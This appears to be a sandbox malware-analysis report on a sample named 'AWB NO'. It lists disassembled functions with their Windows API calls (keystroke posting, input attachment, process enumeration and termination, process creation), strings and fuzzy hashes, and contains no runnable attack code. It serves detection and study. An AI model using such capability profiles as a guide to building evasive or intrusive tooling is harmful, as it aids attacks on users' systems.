                                                              Function 004616DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00461700
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460778,?,00000001), ref: 00461714
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0046171B
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 0046172A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046173C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 00461755
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 00461767
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617AC
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617C1
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: f51c8bfa66544c569d19aaa402eb205ee2878779a81b5281422b9c9027375036
                                                              • Instruction ID: 25e0562e4a853ce0dffc12f93c3d42453493f01f65cd87b86ec24f904145336b
                                                              • Opcode Fuzzy Hash: f51c8bfa66544c569d19aaa402eb205ee2878779a81b5281422b9c9027375036
                                                              • Instruction Fuzzy Hash: 4431B1B5600208BFEB119F15DC84F6A37A9EB15712F14403AF900D63B0EB789D448F5A
                                                              Function 0045A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0045AA64), ref: 0045A9A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: 5002a5fddf50bcde79a6dc7ed207d4ecd5304ff53ed89cbdedaef835e7354da4
                                                              • Instruction ID: fef9e380a92afd939488e92735a90e3e03dac4f82d76b1b1da84a970d37b0683
                                                              • Opcode Fuzzy Hash: 5002a5fddf50bcde79a6dc7ed207d4ecd5304ff53ed89cbdedaef835e7354da4
                                                              • Instruction Fuzzy Hash: 0491A870A005169BDB08DF61C441BEAF774BF04305F50861BDD99A7243DF38696ECBA9
                                                              Function 0046DB04 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0046DCBA
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DCCE
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046DCE6
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046DD00
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DD12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile
                                                              • String ID: *.*
                                                              • API String ID: 769691225-438819550
                                                              • Opcode ID: 4ff4b3304e30e7372bce4acf512d47791e3657f32d4172ef8cbbad650c9c1621
                                                              • Instruction ID: f9490e5959290cb0956c410083a53966904df6dcd6624628cec000a7d302a53e
                                                              • Opcode Fuzzy Hash: 4ff4b3304e30e7372bce4acf512d47791e3657f32d4172ef8cbbad650c9c1621
                                                              • Instruction Fuzzy Hash: A781A171F042449FCB24EF24C84596BB7E8AB88704F19882FF885CB251F639E945CB5B
                                                              Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                              • GetDC.USER32 ref: 0043CF82
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CF95
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CFA3
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CFB8
                                                              • ReleaseDC.USER32(?,00000000), ref: 0043CFC0
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043D04B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: ac078e28f3ea691151e5ef7866497dcbf17aee0d19fba673f73f7b4a748de671
                                                              • Instruction ID: 2191f090442df1d8b75e7b8316c733f380aeebf8947418e196bed5f94657404b
                                                              • Opcode Fuzzy Hash: ac078e28f3ea691151e5ef7866497dcbf17aee0d19fba673f73f7b4a748de671
                                                              • Instruction Fuzzy Hash: 9371E030900204DFCF259F64C884AAB3BB6FF48318F14427BED556A2E6C7398842DB69
                                                              Function 00459645 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32 ref: 00459651
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00459666
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004596F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1290815626-3381328864
                                                              • Opcode ID: 8da25be9963f5362c8281a606c59e80aff7d3ba0eb6a1818d155a44e7ff51480
                                                              • Instruction ID: bc076bbec5daa4fa657486baf201fb4d95d262ba898abc0a63e9505c33c1a26c
                                                              • Opcode Fuzzy Hash: 8da25be9963f5362c8281a606c59e80aff7d3ba0eb6a1818d155a44e7ff51480
                                                              • Instruction Fuzzy Hash: AB110D77284317FAF6112A21EC06DE7779C8B05366F30012BFE00A51D2FE5D5D19565C
                                                              Function 00478F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 0047903D
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00479071
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004791EB
                                                              • SysFreeString.OLEAUT32(?), ref: 00479215
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: b04b0867597dee5a9e4bc7ed899de829a492c47d6f4e073cd839085c3a2da284
                                                              • Instruction ID: d823893b77008293a877efc66923c6ca52dd90e804d3cf8965e8a59a88dd0146
                                                              • Opcode Fuzzy Hash: b04b0867597dee5a9e4bc7ed899de829a492c47d6f4e073cd839085c3a2da284
                                                              • Instruction Fuzzy Hash: 88F13B71A00109EFDB14DFA4C888EEEB7B9FF49314F10845AF919AB291CB35AD46CB54
                                                              Function 004888B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0048896E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: f9955f9f76259972ec6e275ab8be0955b166ab190053183b70d7920e0264596f
                                                              • Instruction ID: ce3ba57332302dd11e88512b1cb2c7dfa5fb76f3510afc4bef344cccc543630f
                                                              • Opcode Fuzzy Hash: f9955f9f76259972ec6e275ab8be0955b166ab190053183b70d7920e0264596f
                                                              • Instruction Fuzzy Hash: A551B530500208BFEF24BF25CC89B6E7B65BB04314FA0492FF515E62E1DF79A9809B59
                                                              Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C547
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C569
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C581
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C59F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C5C0
                                                              • DestroyIcon.USER32(00000000), ref: 0043C5CF
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C5EC
                                                              • DestroyIcon.USER32(?), ref: 0043C5FB
                                                                • Part of subcall function 0048A71E: DeleteObject.GDI32(00000000), ref: 0048A757
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
                                                              • Instruction ID: ec079f4291a2db88e8ca5db72d3a048905e4d4933e17b5c0ba9f28e8cd77e0c5
                                                              • Opcode Fuzzy Hash: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
                                                              • Instruction Fuzzy Hash: 90515C74600205AFDB24DF25CD89FAA37B5EB58710F10452EF902A72D0DBB8ED91DB68
                                                              Function 00459B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045AE77
                                                                • Part of subcall function 0045AE57: GetCurrentThreadId.KERNEL32 ref: 0045AE7E
                                                                • Part of subcall function 0045AE57: AttachThreadInput.USER32(00000000,?,00459B65,?,00000001), ref: 0045AE85
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459B70
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00459B8D
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00459B90
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459B99
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00459BB7
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00459BBA
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459BC3
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00459BDA
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00459BDD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: 186f5a4a339b244dea2483338f7b71a3368c4d65e5ecd7b2cf0cf16f5cfcc7d8
                                                              • Instruction ID: 1060ee3db04237a4cc3f6e3244fd23507871b35e4bea80529f675733977b5495
                                                              • Opcode Fuzzy Hash: 186f5a4a339b244dea2483338f7b71a3368c4d65e5ecd7b2cf0cf16f5cfcc7d8
                                                              • Instruction Fuzzy Hash: EA112571550608BEF6102B20DC8EF6E3B1CEB0C755F100829F604AB0A1CAF26C10DBA8
                                                              Function 00458E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00458A84,00000B00,?,?), ref: 00458E0C
                                                              • HeapAlloc.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E13
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00458A84,00000B00,?,?), ref: 00458E28
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00458A84,00000B00,?,?), ref: 00458E30
                                                              • DuplicateHandle.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E33
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00458A84,00000B00,?,?), ref: 00458E43
                                                              • GetCurrentProcess.KERNEL32(00458A84,00000000,?,00458A84,00000B00,?,?), ref: 00458E4B
                                                              • DuplicateHandle.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E4E
                                                              • CreateThread.KERNEL32(00000000,00000000,00458E74,00000000,00000000,00000000), ref: 00458E68
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: f61be43bb8a549cd9dad831aeb1a4a8effc801e856b1440697cddf08235fc6c0
                                                              • Instruction ID: 70dccc8d23a24c8ac5b2d36c23d1fc0ed308eed34d74bf8a4b11e0e697da6625
                                                              • Opcode Fuzzy Hash: f61be43bb8a549cd9dad831aeb1a4a8effc801e856b1440697cddf08235fc6c0
                                                              • Instruction Fuzzy Hash: 8E01BBB5240348FFE710ABA5DC8DF6B3BACEB89711F104825FA05DB1A1CA759C14CB24
                                                              Function 00479428 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit
                                                              • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2610073882-2080382077
                                                              • Opcode ID: 4013e02310124dc19a24c960c86c17278dc50ef420e9ab73daa2bbda93c8a083
                                                              • Instruction ID: fcebb0c40d61f867c18811628665e3ff882c4d71f35d8502a0dec60dd81a9e36
                                                              • Opcode Fuzzy Hash: 4013e02310124dc19a24c960c86c17278dc50ef420e9ab73daa2bbda93c8a083
                                                              • Instruction Fuzzy Hash: 2791AD71A00215ABCF24DFA5C844FEFBBB8EF45714F10851AE519AB280D778AD05CFA8
                                                              Function 0042A408 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,004C43BA,00000104,?,00000001,00000000), ref: 0042A49A
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 0042A554
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 0042A5A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$HandleModuleNameWrite
                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                              • API String ID: 3784150691-4022980321
                                                              • Opcode ID: 6558d356d4fb72d9e578eb9f05dedf925c23385bc6d14cf4d5c971fd03e6a844
                                                              • Instruction ID: 186c83fd4b845c833e743025fb1ca7bd7b0fd00e4ef13018c7e0743ce814b104
                                                              • Opcode Fuzzy Hash: 6558d356d4fb72d9e578eb9f05dedf925c23385bc6d14cf4d5c971fd03e6a844
                                                              • Instruction Fuzzy Hash: EB418831B40331B7D7207669BC16FAF77586B95718F90013FFD0592282EA6C8EA4419E
                                                              Function 0047EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00463E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00463EB6
                                                                • Part of subcall function 00463E91: Process32FirstW.KERNEL32(00000000,?), ref: 00463EC4
                                                                • Part of subcall function 00463E91: CloseHandle.KERNEL32(00000000), ref: 00463F8E
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047ECB8
                                                              • GetLastError.KERNEL32 ref: 0047ECCB
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047ECFA
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047ED77
                                                              • GetLastError.KERNEL32(00000000), ref: 0047ED82
                                                              • CloseHandle.KERNEL32(00000000), ref: 0047EDB7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: d210f5fba0b77d67c3e10e65e148b4b3e5ca715f1fd353a27fcbe2172b4d1d1e
                                                              • Instruction ID: 4cf0eb32de62198d0c9cb5bf7051436c97b1413fca3c9407eb77a24df7e76fd2
                                                              • Opcode Fuzzy Hash: d210f5fba0b77d67c3e10e65e148b4b3e5ca715f1fd353a27fcbe2172b4d1d1e
                                                              • Instruction Fuzzy Hash: 364180712002019FD724EF15CC95FAEB7A5AF44718F04846EF8469B2C2DB79AC09CB9A
                                                              Function 0047F9A8 Relevance: 12.4, APIs: 8, Instructions: 386processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047FB5C
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047FB80
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047FBC0
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047FBE2
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FD5E
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FD90
                                                              • CloseHandle.KERNEL32(?), ref: 0047FDBF
                                                              • CloseHandle.KERNEL32(?), ref: 0047FE36
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 2947177986-0
                                                              • Opcode ID: 16747152b454cde32b069cda312c17f1d5783ae266d9b6325819c7904a237f4f
                                                              • Instruction ID: 1b9b8e5a807dcbe041a314dc5fa2e233be69bb52cf2b98a2e3215593ab0b3364
                                                              • Opcode Fuzzy Hash: 16747152b454cde32b069cda312c17f1d5783ae266d9b6325819c7904a237f4f
